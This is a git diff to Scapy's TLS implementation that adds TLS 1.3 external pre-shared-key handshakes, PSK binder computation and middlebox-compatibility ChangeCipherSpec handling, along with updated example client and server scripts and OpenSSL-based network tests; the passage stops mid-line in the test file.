TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group=self.curve)]), # noqa: E501 - TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss", - "sha256+rsa"])] if self.client_hello: - if not self.client_hello.ext: - self.client_hello.ext = ext p = self.client_hello else: if self.ciphersuite is None: c = 0x1301 else: c = self.ciphersuite - p = TLS13ClientHello(ciphers=c, ext=ext) + p = TLS13ClientHello(ciphers=c) + + ext = [] + ext += TLS_Ext_SupportedVersion_CH(versions=["TLS 1.3"]) + + if self.cur_session.tls13_psk_secret: + if self.tls13_psk_mode == "psk_dhe_ke": + ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_dhe_ke") + ext += TLS_Ext_SupportedGroups(groups=supported_groups) + ext += TLS_Ext_KeyShare_CH( + client_shares=[KeyShareEntry(group=self.curve)] + ) + else: + ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_ke") + # RFC844, section 4.2.11. + # "The "pre_shared_key" extension MUST be the last extension + # in the ClientHello " + hkdf = TLS13_HKDF("sha256") + hash_len = hkdf.hash.digest_size + psk_id = PSKIdentity(identity='Client_identity') + # XXX see how to not pass binder as argument + psk_binder_entry = PSKBinderEntry(binder_len=hash_len, + binder=b"\x00" * hash_len) + + ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], + binders=[psk_binder_entry]) + else: + ext += TLS_Ext_SupportedGroups(groups=supported_groups) + ext += TLS_Ext_KeyShare_CH( + client_shares=[KeyShareEntry(group=self.curve)] + ) + ext += TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss", + "sha256+rsa"]) + p.ext = ext self.add_msg(p) raise self.TLS13_ADDED_CLIENTHELLO() @@ -967,10 +1004,32 @@ def tls13_should_add_ClientHello_Retry(self): selected_version = e.version if not selected_group or not selected_version: raise self.CLOSE_NOTIFY() - ext = [TLS_Ext_SupportedVersion_CH(versions=[_tls_version[selected_version]]), # noqa: E501 - TLS_Ext_SupportedGroups(groups=[_tls_named_groups[selected_group]]), # noqa: E501 - TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group=selected_group)]), # noqa: E501 - TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss"])] + + ext = [] + ext += TLS_Ext_SupportedVersion_CH(versions=[_tls_version[selected_version]]) # noqa: E501 + + if s.tls13_psk_secret: + if self.tls13_psk_mode == "psk_dhe_ke": + ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_dhe_ke"), + ext += TLS_Ext_SupportedGroups(groups=[_tls_named_groups[selected_group]]) # noqa: E501 + ext += TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group=selected_group)]) # noqa: E501 + else: + ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_ke") + + hkdf = TLS13_HKDF("sha256") + hash_len = hkdf.hash.digest_size + psk_id = PSKIdentity(identity='Client_identity') + psk_binder_entry = PSKBinderEntry(binder_len=hash_len, + binder=b"\x00" * hash_len) + + ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], + binders=[psk_binder_entry]) + + else: + ext += TLS_Ext_SupportedGroups(groups=[_tls_named_groups[selected_group]]) # noqa: E501 + ext += TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group=selected_group)]) # noqa: E501 + ext += TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss"]) + p = TLS13ClientHello(ciphers=ciphersuite, ext=ext) self.add_msg(p) raise self.TLS13_ADDED_CLIENTHELLO() @@ -979,21 +1038,22 @@ def tls13_should_add_ClientHello_Retry(self): def TLS13_HANDLED_SERVERHELLO(self): pass - @ATMT.state() - def TLS13_WAITING_ENCRYPTEDEXTENSIONS(self): - self.get_next_msg() - - @ATMT.condition(TLS13_WAITING_ENCRYPTEDEXTENSIONS) - def tls13_should_handle_EncryptedExtensions(self): - self.raise_on_packet(TLSEncryptedExtensions, - self.TLS13_WAITING_CERTIFICATE) - @ATMT.condition(TLS13_HANDLED_SERVERHELLO, prio=1) def tls13_should_handle_encrytpedExtensions(self): self.raise_on_packet(TLSEncryptedExtensions, self.TLS13_HANDLED_ENCRYPTEDEXTENSIONS) @ATMT.condition(TLS13_HANDLED_SERVERHELLO, prio=2) + def tls13_should_handle_ChangeCipherSpec(self): + self.raise_on_packet(TLSChangeCipherSpec, + self.TLS13_HANDLED_CHANGE_CIPHER_SPEC) + + @ATMT.state() + def TLS13_HANDLED_CHANGE_CIPHER_SPEC(self): + self.cur_session.middlebox_compatibility = True + raise self.TLS13_HANDLED_SERVERHELLO() + + @ATMT.condition(TLS13_HANDLED_SERVERHELLO, prio=3) def tls13_missing_encryptedExtension(self): self.vprint("Missing TLS 1.3 EncryptedExtensions message!") raise self.CLOSE_NOTIFY() @@ -1015,6 +1075,12 @@ def tls13_should_handle_certificateRequest_from_encryptedExtensions(self): def tls13_should_handle_certificate_from_encryptedExtensions(self): self.tls13_should_handle_Certificate() + @ATMT.condition(TLS13_HANDLED_ENCRYPTEDEXTENSIONS, prio=3) + def tls13_should_handle_finished_from_encryptedExtensions(self): + if self.cur_session.tls13_psk_secret: + self.raise_on_packet(TLSFinished, + self.TLS13_HANDLED_FINISHED) + @ATMT.state() def TLS13_HANDLED_CERTIFICATEREQUEST(self): pass @@ -1056,6 +1122,9 @@ def TLS13_HANDLED_FINISHED(self): @ATMT.state() def TLS13_PREPARE_CLIENTFLIGHT2(self): + if self.cur_session.middlebox_compatibility: + self.add_record(is_tls12=True) + self.add_msg(TLSChangeCipherSpec()) self.add_record(is_tls13=True) @ATMT.condition(TLS13_PREPARE_CLIENTFLIGHT2, prio=1) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 1129fbeffbd..c5a3f4fb07a 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -18,6 +18,7 @@ from __future__ import print_function import socket +import binascii from scapy.packet import Raw from scapy.pton_ntop import inet_pton @@ -30,9 +31,10 @@ from scapy.layers.tls.crypto.groups import _tls_named_groups from scapy.layers.tls.extensions import TLS_Ext_SupportedVersion_SH, \ TLS_Ext_SupportedGroups, TLS_Ext_Cookie, \ - TLS_Ext_SignatureAlgorithms + TLS_Ext_SignatureAlgorithms, TLS_Ext_PSKKeyExchangeModes from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_SH, \ - KeyShareEntry, TLS_Ext_KeyShare_HRR + KeyShareEntry, TLS_Ext_KeyShare_HRR, TLS_Ext_PreSharedKey_CH, \ + TLS_Ext_PreSharedKey_SH from scapy.layers.tls.handshake import TLSCertificate, TLSCertificateRequest, \ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, TLSFinished, \ TLSServerHello, TLSServerHelloDone, TLSServerKeyExchange, \ @@ -81,6 +83,8 @@ def parse_args(self, server="127.0.0.1", sport=4433, max_client_idle_time=60, curve=None, cookie=False, + psk=None, + psk_mode=None, **kargs): super(TLSServerAutomaton, self).parse_args(mycert=mycert, @@ -108,6 +112,8 @@ def parse_args(self, server="127.0.0.1", sport=4433, self.max_client_idle_time = max_client_idle_time self.curve = None self.cookie = cookie + self.psk_secret = psk + self.psk_mode = psk_mode for (group_id, ng) in _tls_named_groups.items(): if ng == curve: self.curve = group_id @@ -155,7 +161,6 @@ def http_sessioninfo(self): body = "
%s
\r\n\r\n" % s answer = (header + body) % len(body) return answer - return answer @ATMT.state(initial=True) def INITIAL(self): @@ -570,6 +575,27 @@ def tls13_PREPARE_SERVERFLIGHT1(self): @ATMT.condition(tls13_PREPARE_SERVERFLIGHT1) def tls13_should_add_ServerHello(self): + + psk_identity = None + psk_key_exchange_mode = None + obfuscated_age = None + # XXX check ClientHello extensions... + for m in reversed(self.cur_session.handshake_messages_parsed): + if isinstance(m, (TLS13ClientHello, TLSClientHello)): + for e in m.ext: + if isinstance(e, TLS_Ext_PreSharedKey_CH): + psk_identity = e.identities[0].identity + obfuscated_age = e.identities[0].obfuscated_ticket_age + # binder = e.binders[0].binder + + # For out-of-bound PSK, obfuscated_ticket_age should be + # 0. We use this field to distinguish between out-of- + # bound PSK and resumed PSK + is_out_of_band_psk = (obfuscated_age == 0) + + if isinstance(e, TLS_Ext_PSKKeyExchangeModes): + psk_key_exchange_mode = e.kxmodes[0] + if isinstance(self.mykey, PrivKeyRSA): kx = "RSA" elif isinstance(self.mykey, PrivKeyECDSA): @@ -577,8 +603,22 @@ def tls13_should_add_ServerHello(self): usable_suites = get_usable_ciphersuites(self.cur_pkt.ciphers, kx) c = usable_suites[0] group = next(iter(self.cur_session.tls13_client_pubshares)) - ext = [TLS_Ext_SupportedVersion_SH(version="TLS 1.3"), - TLS_Ext_KeyShare_SH(server_share=KeyShareEntry(group=group))] + ext = [TLS_Ext_SupportedVersion_SH(version="TLS 1.3")] + if (psk_identity and obfuscated_age and psk_key_exchange_mode): + s = self.cur_session + if is_out_of_band_psk: + # Handshake with external PSK authentication + # XXX test that self.psk_secret is set + s.tls13_psk_secret = binascii.unhexlify(self.psk_secret) + # 0: "psk_ke" + # 1: "psk_dhe_ke" + if psk_key_exchange_mode == 1: + server_kse = KeyShareEntry(group=group) + ext += TLS_Ext_KeyShare_SH(server_share=server_kse) + ext += TLS_Ext_PreSharedKey_SH(selected_identity=0) + else: + # Standard Handshake + ext += TLS_Ext_KeyShare_SH(server_share=KeyShareEntry(group=group)) if self.cur_session.sid is not None: p = TLS13ServerHello(cipher=c, sid=self.cur_session.sid, ext=ext) @@ -589,6 +629,13 @@ def tls13_should_add_ServerHello(self): @ATMT.state() def tls13_ADDED_SERVERHELLO(self): + # If the client proposed a non-empty session ID in his ClientHello + # he requested the middlebox compatibility mode (RFC8446, appendix D.4) + # In this case, the server should send a dummy ChangeCipherSpec in + # between the ServerHello and the encrypted handshake messages + if self.cur_session.sid is not None: + self.add_record(is_tls12=True) + self.add_msg(TLSChangeCipherSpec()) pass @ATMT.condition(tls13_ADDED_SERVERHELLO) @@ -615,11 +662,15 @@ def tls13_ADDED_CERTIFICATEREQUEST(self): @ATMT.condition(tls13_ADDED_CERTIFICATEREQUEST) def tls13_should_add_Certificate(self): - certs = [] - for c in self.cur_session.server_certs: - certs += _ASN1CertAndExt(cert=c) - - self.add_msg(TLS13Certificate(certs=certs)) + # If a PSK is set, an extension pre_shared_key + # was send in the ServerHello. No certificate should + # be send here + if not self.cur_session.tls13_psk_secret: + certs = [] + for c in self.cur_session.server_certs: + certs += _ASN1CertAndExt(cert=c) + + self.add_msg(TLS13Certificate(certs=certs)) raise self.tls13_ADDED_CERTIFICATE() @ATMT.state() @@ -628,7 +679,8 @@ def tls13_ADDED_CERTIFICATE(self): @ATMT.condition(tls13_ADDED_CERTIFICATE) def tls13_should_add_CertificateVerifiy(self): - self.add_msg(TLSCertificateVerify()) + if not self.cur_session.tls13_psk_secret: + self.add_msg(TLSCertificateVerify()) raise self.tls13_ADDED_CERTIFICATEVERIFY() @ATMT.state() @@ -647,27 +699,6 @@ def tls13_ADDED_SERVERFINISHED(self): @ATMT.condition(tls13_ADDED_SERVERFINISHED) def tls13_should_send_ServerFlight1(self): self.flush_records() - raise self.tls13_HANDLED_SERVERFLIGHT1() - - @ATMT.state() - def tls13_HANDLED_SERVERFLIGHT1(self): - pass - - @ATMT.condition(tls13_HANDLED_SERVERFLIGHT1, prio=1) - def tls13_should_handle_ChangeCipherSpec(self): - self.raise_on_packet(TLSChangeCipherSpec, - self.tls13_HANDLED_CHANGECIPHERSPEC) - - @ATMT.state() - def tls13_HANDLED_CHANGECIPHERSPEC(self): - pass - - @ATMT.condition(tls13_HANDLED_SERVERFLIGHT1, prio=2) - def tls13_missing_ChangeCipherSpec(self): - raise self.tls13_WAITING_CLIENTFLIGHT2() - - @ATMT.condition(tls13_HANDLED_CHANGECIPHERSPEC) - def tls13_should_wait_ClientFlight2(self): raise self.tls13_WAITING_CLIENTFLIGHT2() @ATMT.state() @@ -684,7 +715,17 @@ def tls13_should_handle_ClientFlight2(self): self.raise_on_packet(TLS13Certificate, self.TLS13_HANDLED_CLIENTCERTIFICATE) + # For Middlebox compatibility (see RFC8446, appendix D.4) + # a dummy ChangeCipherSpec record can be send. In this case, + # this function just read the ChangeCipherSpec message and + # go back in a previous state continuing with the next TLS 1.3 + # record @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=2) + def tls13_should_handle_ClientCCS(self): + self.raise_on_packet(TLSChangeCipherSpec, + self.tls13_RECEIVED_CLIENTFLIGHT2) + + @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=3) def tls13_no_ClientCertificate(self): if self.client_auth: raise self.TLS13_MISSING_CLIENTCERTIFICATE() @@ -840,7 +881,7 @@ def close_session_final(self): self.flush_records() except Exception: self.vprint("Could not send termination Alert, maybe the client left?") # noqa: E501 - # We might call shutdown, but unit tests with s_client fail with this. + # We might call shutdown, but unit tests with s_client fail with this # self.socket.shutdown(1) self.socket.close() raise self.FINAL() diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 9e7cdf8afd1..4d32bfdfed5 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -12,6 +12,7 @@ from __future__ import absolute_import import math +import os import struct from scapy.error import log_runtime, warning @@ -41,6 +42,7 @@ SigAndHashAlgsLenField) from scapy.layers.tls.session import (_GenericTLSSessionInheritance, readConnState, writeConnState) +from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_PreSharedKey_CH from scapy.layers.tls.crypto.compression import (_tls_compression_algs, _tls_compression_algs_cls, Comp_NULL, _GenericComp, @@ -293,7 +295,6 @@ def tls_session_update(self, msg_str): along with the raw string representing this handshake message. """ super(TLSClientHello, self).tls_session_update(msg_str) - s = self.tls_session s.advertised_tls_version = self.version # This ClientHello could be a 1.3 one. Let's store the sid @@ -311,6 +312,9 @@ def tls_session_update(self, msg_str): for e in self.ext: if isinstance(e, TLS_Ext_SupportedVersion_CH): s.advertised_tls_version = e.versions[0] + if s.sid: + s.middlebox_compatibility = True + if isinstance(e, TLS_Ext_SignatureAlgorithms): s.advertised_sig_algs = e.sig_algs @@ -355,7 +359,49 @@ class TLS13ClientHello(_TLSHandshake): def post_build(self, p, pay): if self.random_bytes is None: p = p[:6] + randstring(32) + p[6 + 32:] - return super(TLS13ClientHello, self).post_build(p, pay) + # We don't call the post_build function from class _TLSHandshake + # to compute the message length because we need that value now + # for the HMAC in binder + tmp_len = len(p) + if self.msglen is None: + sz = tmp_len - 4 + p = struct.pack("!I", (orb(p[0]) << 24) | sz) + p[4:] + s = self.tls_session + if self.ext: + for e in self.ext: + if isinstance(e, TLS_Ext_PreSharedKey_CH): + hkdf = TLS13_HKDF("sha256") + hash_len = hkdf.hash.digest_size + s.compute_tls13_early_secrets(external=True) + + # RFC8446 4.2.11.2 + # "Each entry in the binders list is computed as an HMAC + # over a transcript hash (see Section 4.4.1) containing a + # partial ClientHello up to and including the + # PreSharedKeyExtension.identities field." + # PSK Binders field is : + # - PSK Binders length (2 bytes) + # - First PSK Binder length (1 byte) + + # HMAC (hash_len bytes) + # The PSK Binder is computed in the same way as the + # Finished message with binder_key as BaseKey + + handshake_context = b"" + if s.tls13_retry: + for m in s.handshake_messages: + handshake_context += m + handshake_context += p[:-hash_len - 3] + + binder_key = s.tls13_derived_secrets["binder_key"] + psk_binder = hkdf.compute_verify_data(binder_key, + handshake_context) + + # Here, we replaced the last 32 bytes of the packet by the + # new HMAC values computed over the ClientHello (without + # the binders) + p = p[:-hash_len] + psk_binder + + return p + pay def tls_session_update(self, msg_str): """ @@ -367,6 +413,8 @@ def tls_session_update(self, msg_str): if self.sidlen and self.sidlen > 0: s.sid = self.sid + s.middlebox_compatibility = True + self.random_bytes = msg_str[10:38] s.client_random = self.random_bytes if self.ext: @@ -549,17 +597,20 @@ def tls_session_update(self, msg_str): cs_cls = _tls_cipher_suites_cls[cs_val] connection_end = s.connection_end - if connection_end == "server": s.pwcs = writeConnState(ciphersuite=cs_cls, connection_end=connection_end, tls_version=s.tls_version) - s.triggered_pwcs_commit = True + + if not s.middlebox_compatibility: + s.triggered_pwcs_commit = True elif connection_end == "client": + s.prcs = readConnState(ciphersuite=cs_cls, connection_end=connection_end, tls_version=s.tls_version) - s.triggered_prcs_commit = True + if not s.middlebox_compatibility: + s.triggered_prcs_commit = True if s.tls13_early_secret is None: # In case the connState was not pre-initialized, we could not @@ -595,9 +646,15 @@ def tls_session_update(self, msg_str): s.tls13_client_pubshares = {} # If the server responds to a ClientHello with a HelloRetryRequest # The value of the first ClientHello is replaced by a message_hash - cs_cls = _tls_cipher_suites_cls[self.cipher] - hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) - hash_len = hkdf.hash.digest_size + if s.client_session_ticket: + cs_cls = _tls_cipher_suites_cls[s.tls13_ticket_ciphersuite] + hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) + hash_len = hkdf.hash.digest_size + else: + cs_cls = _tls_cipher_suites_cls[self.cipher] + hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) + hash_len = hkdf.hash.digest_size + handshake_context = struct.pack("B", 254) handshake_context += struct.pack("B", 0) handshake_context += struct.pack("B", 0) @@ -646,12 +703,14 @@ def post_build_tls_session_update(self, msg_str): connection_end=connection_end, tls_version=s.tls_version) - s.triggered_prcs_commit = True chts = s.tls13_derived_secrets["client_handshake_traffic_secret"] # noqa: E501 s.prcs.tls13_derive_keys(chts) - s.rcs = self.tls_session.prcs - s.triggered_prcs_commit = False + if not s.middlebox_compatibility: + s.rcs = self.tls_session.prcs + s.triggered_prcs_commit = False + else: + s.triggered_prcs_commit = True def post_dissection_tls_session_update(self, msg_str): self.tls_session_update(msg_str) @@ -675,13 +734,13 @@ def post_dissection_tls_session_update(self, msg_str): s.pwcs = writeConnState(ciphersuite=type(s.rcs.ciphersuite), connection_end=connection_end, tls_version=s.tls_version) - - s.triggered_pwcs_commit = True chts = s.tls13_derived_secrets["client_handshake_traffic_secret"] # noqa: E501 s.pwcs.tls13_derive_keys(chts) - - s.wcs = self.tls_session.pwcs - s.triggered_pwcs_commit = False + if not s.middlebox_compatibility: + s.wcs = self.tls_session.pwcs + s.triggered_pwcs_commit = False + else: + s.triggered_prcs_commit = True ############################################################################### # Certificate # ############################################################################### @@ -1482,6 +1541,31 @@ class TLS13NewSessionTicket(_TLSHandshake): (pkt.ticketlen or 0) - # noqa: E501 pkt.noncelen or 0) - 13)] # noqa: E501 + def build(self): + fval = self.getfieldval("ticket") + if fval == b"": + # Here, the ticket is just a random 48-byte label + # The ticket may also be a self-encrypted and self-authenticated + # value + self.ticket = os.urandom(48) + + fval = self.getfieldval("ticket_nonce") + if fval == b"": + # Nonce is randomly chosen + self.ticket_nonce = os.urandom(32) + + fval = self.getfieldval("ticket_lifetime") + if fval == 0xffffffff: + # ticket_lifetime is set to 12 hours + self.ticket_lifetime = 43200 + + fval = self.getfieldval("ticket_age_add") + if fval == 0: + # ticket_age_add is a random 32-bit value + self.ticket_age_add = struct.unpack("!I", os.urandom(4))[0] + + return _TLSHandshake.build(self) + def post_dissection_tls_session_update(self, msg_str): self.tls_session_update(msg_str) if self.tls_session.connection_end == "client": diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index d258a7dc270..79de0bc569a 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -204,10 +204,12 @@ def addfield(self, pkt, s, val): res += self.i2m(pkt, p) # Add TLS13ClientHello in case of HelloRetryRequest + # Add ChangeCipherSpec for middlebox compatibility if (isinstance(pkt, _GenericTLSSessionInheritance) and _tls_version_check(pkt.tls_session.tls_version, 0x0304) and not isinstance(pkt.msg[0], TLS13ServerHello) and - not isinstance(pkt.msg[0], TLS13ClientHello)): + not isinstance(pkt.msg[0], TLS13ClientHello) and + not isinstance(pkt.msg[0], TLSChangeCipherSpec)): return s + res if not pkt.type: @@ -306,7 +308,8 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return SSLv2 s = kargs.get("tls_session", None) if s and _tls_version_check(s.tls_version, 0x0304): - if s.rcs and not isinstance(s.rcs.cipher, Cipher_NULL): + if (s.rcs and not isinstance(s.rcs.cipher, Cipher_NULL) and + byte0 == 0x17): from scapy.layers.tls.record_tls13 import TLS13 return TLS13 if plen < 5: diff --git a/scapy/layers/tls/record_tls13.py b/scapy/layers/tls/record_tls13.py index deb7478ccfa..7e2211092e9 100644 --- a/scapy/layers/tls/record_tls13.py +++ b/scapy/layers/tls/record_tls13.py @@ -61,16 +61,6 @@ def pre_dissect(self, s): return s -class TLSInnerChangeCipherSpec(_GenericTLSSessionInheritance): - __slots__ = ["type"] - name = "TLS Inner Plaintext (CCS)" - fields_desc = [_TLSMsgListField("msg", [], length_from=lambda x: 1)] - - def __init__(self, _pkt=None, *args, **kwargs): - self.type = 0x14 - super(TLSInnerChangeCipherSpec, self).__init__(_pkt, *args, **kwargs) - - class _TLSInnerPlaintextField(PacketField): def __init__(self, name, default, *args, **kargs): super(_TLSInnerPlaintextField, self).__init__(name, @@ -78,13 +68,9 @@ def __init__(self, name, default, *args, **kargs): TLSInnerPlaintext) def m2i(self, pkt, m): - if pkt.type == 0x14: - return TLSInnerChangeCipherSpec(m, tls_session=pkt.tls_session) return self.cls(m, tls_session=pkt.tls_session) def getfield(self, pkt, s): - if pkt.type == 0x14: - return super(_TLSInnerPlaintextField, self).getfield(pkt, s) tag_len = pkt.tls_session.rcs.mac_len frag_len = pkt.len - tag_len if frag_len < 1: diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 24b2d111b8a..b9e6bf978bc 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -439,6 +439,10 @@ def __init__(self, self.tls13_handshake_secret = None self.tls13_master_secret = None self.tls13_derived_secrets = {} + self.post_handshake_auth = False + self.tls13_ticket_ciphersuite = None + self.tls13_retry = False + self.middlebox_compatibility = False # Handshake messages needed for Finished computation/validation. # No record layer headers, no HelloRequests, no ChangeCipherSpecs. diff --git a/test/tls/example_client.py b/test/tls/example_client.py index b3503cf15a3..129a140064d 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -5,10 +5,7 @@ """ Basic TLS client. A ciphersuite may be commanded via a first argument. -Default protocol version is TLS 1.2. - -For instance, "sudo ./client_simple.py c014" will try to connect to any TLS -server at 127.0.0.1:4433, with suite TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA. +Default protocol version is TLS 1.3. """ import os @@ -18,24 +15,49 @@ sys.path=[basedir]+sys.path from scapy.layers.tls.automaton_cli import TLSClientAutomaton +from scapy.layers.tls.basefields import _tls_version_options from scapy.layers.tls.handshake import TLSClientHello, TLS13ClientHello +from argparse import ArgumentParser + +psk = None +parser = ArgumentParser(description='Simple TLS Client') +parser.add_argument("--psk", + help="External PSK for symmetric authentication (for TLS 1.3)") # noqa: E501 +parser.add_argument("--no_pfs", action="store_true", + help="Disable (EC)DHE exchange with PFS") +parser.add_argument("--ciphersuite", help="Ciphersuite preference") +parser.add_argument("--version", help="TLS Version", default="tls13") + +args = parser.parse_args() + +# By default, PFS is set +if args.no_pfs: + psk_mode = "psk_ke" +else: + psk_mode = "psk_dhe_ke" + +v = _tls_version_options.get(args.version, None) +if not v: + sys.exit("Unrecognized TLS version option.") + + -if len(sys.argv) == 2: - ciphers = int(sys.argv[1], 16) +if args.ciphersuite: + ciphers = int(args.ciphersuite, 16) if ciphers not in list(range(0x1301, 0x1306)): ch = TLSClientHello(ciphers=ciphers) - version = "tls12" else: ch = TLS13ClientHello(ciphers=ciphers) - version = "tls13" else: ch = None - version = "tls13" t = TLSClientAutomaton(client_hello=ch, - version=version, + version=args.version, mycert=basedir+"/test/tls/pki/cli_cert.pem", - mykey=basedir+"/test/tls/pki/cli_key.pem") + mykey=basedir+"/test/tls/pki/cli_key.pem", + psk=args.psk, + psk_mode=psk_mode, + ) t.run() diff --git a/test/tls/example_server.py b/test/tls/example_server.py index 5d8c6320f2c..60806081ba2 100755 --- a/test/tls/example_server.py +++ b/test/tls/example_server.py @@ -21,6 +21,10 @@ from argparse import ArgumentParser parser = ArgumentParser(description='Simple TLS Server') +parser.add_argument("--psk", + help="External PSK for symmetric authentication (for TLS 1.3)") # noqa: E501 +parser.add_argument("--no_pfs", action="store_true", + help="Disable (EC)DHE exchange with PFS") # args.curve must be a value in the dict _tls_named_curves (see tls/crypto/groups.py) parser.add_argument("--curve", help="ECC curve to advertise (ex: secp256r1...") parser.add_argument("--cookie", action="store_true", @@ -30,11 +34,18 @@ args = parser.parse_args() pcs = None +# PFS is set by default... +if args.no_pfs and args.psk: + psk_mode = "psk_ke" +else: + psk_mode = "psk_dhe_ke" t = TLSServerAutomaton(mycert=basedir+'/test/tls/pki/srv_cert.pem', mykey=basedir+'/test/tls/pki/srv_key.pem', preferred_ciphersuite=pcs, client_auth=args.client_auth, curve=args.curve, - cookie=args.cookie) + cookie=args.cookie, + psk=args.psk, + psk_mode=psk_mode) t.run() diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index ad88b5c77d8..eea014ed5b6 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -51,12 +51,15 @@ def check_output_for_data(out, err, expected_data): return (False, errored) output = out.s.strip() if expected_data: - s = re.search("> Received: '([^']*)'", output) - if s: - data = s.group(1) - print("Test output: %s" % data) - if expected_data in data: - return (True, data) + expected_data = plain_str(expected_data) + print("Testing for output: '%s'" % expected_data) + p = re.compile(r"> Received: b?'([^']*)'") + for s in p.finditer(output): + if s: + data = s.group(1) + print("Found: %s" % data) + if expected_data in data: + return (True, data) return (False, output) else: return (False, None) @@ -65,7 +68,7 @@ def get_file(filename): return os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename -def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False): +def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False, psk=None): correct = False print("Server started !") with captured_output() as (out, err): @@ -77,12 +80,17 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= print(mycert) assert os.path.exists(mycert) assert os.path.exists(mykey) + kwargs = dict() + if psk: + kwargs["psk"] = psk + kwargs["psk_mode"] = "psk_dhe_ke" t = TLSServerAutomaton(mycert=mycert, mykey=mykey, curve=curve, cookie=cookie, client_auth=client_auth, - debug=5) + debug=5, + **kwargs) # Sync threads q.put(True) # Run server automaton @@ -92,11 +100,12 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= # Return data q.put(res) -def test_tls_server(suite="", version="", tls13=False, client_auth=False): +def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=None): msg = ("TestS_%s_data" % suite).encode() # Run server q_ = Queue() - th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_, None, False, client_auth)) + th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), + kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "psk": psk}) th_.setDaemon(True) th_.start() # Synchronise threads @@ -115,6 +124,8 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False): ] if client_auth: args.extend(["-cert", mycert, "-key", mykey]) + if psk: + args.extend(["-psk", str(psk)]) p = subprocess.Popen( args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT @@ -134,6 +145,7 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False): break else: _one_success = True + break if _failed or not _one_success: raise RuntimeError("OpenSSL returned unexpected values") # Wait for server @@ -143,7 +155,9 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False): # Analyse values if q_.empty(): raise RuntimeError("Missing return values") - print(q_.get()) + ret = q_.get(timeout=5) + print(ret) + assert ret[0] = Testing TLS server with TLS 1.0 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA @@ -176,6 +190,11 @@ test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True) test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True, client_auth=True) += Testing TLS server with TLS 1.3 and ECDHE-PSK-AES256-CBC-SHA384 and PSK +~ open_ssl_client + +test_tls_server("ECDHE-PSK-AES256-CBC-SHA384", "-tls1_3", tls13=False, psk="1a2b3c4d") + + TLS client automaton tests ~ client @@ -190,27 +209,33 @@ from scapy.modules.six.moves.queue import Queue send_data = cipher_suite_code = version = None -def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, client_auth=False): +def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, + client_auth=False, key_update=False): print("Loading client...") mycert = get_file("/test/tls/pki/cli_cert.pem") if client_auth else None mykey = get_file("/test/tls/pki/cli_key.pem") if client_auth else None + commands = [send_data] + if key_update: + commands += ["key_update"] + commands.extend([b"stop_server", b"quit"]) if version == "0002": - t = TLSClientAutomaton(data=[send_data, b"stop_server", b"quit"], version="sslv2", debug=5, mycert=mycert, mykey=mykey) + t = TLSClientAutomaton(data=commands, version="sslv2", debug=5, mycert=mycert, mykey=mykey) elif version == "0304": ch = TLS13ClientHello(ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=[send_data, b"stop_server", b"quit"], version="tls13", debug=5, mycert=mycert, mykey=mykey) + t = TLSClientAutomaton(client_hello=ch, data=commands, version="tls13", debug=5, mycert=mycert, mykey=mykey) else: ch = TLSClientHello(version=int(version, 16), ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=[send_data, b"stop_server", b"quit"], debug=5, mycert=mycert, mykey=mykey) + t = TLSClientAutomaton(client_hello=ch, data=commands, debug=5, mycert=mycert, mykey=mykey) print("Running 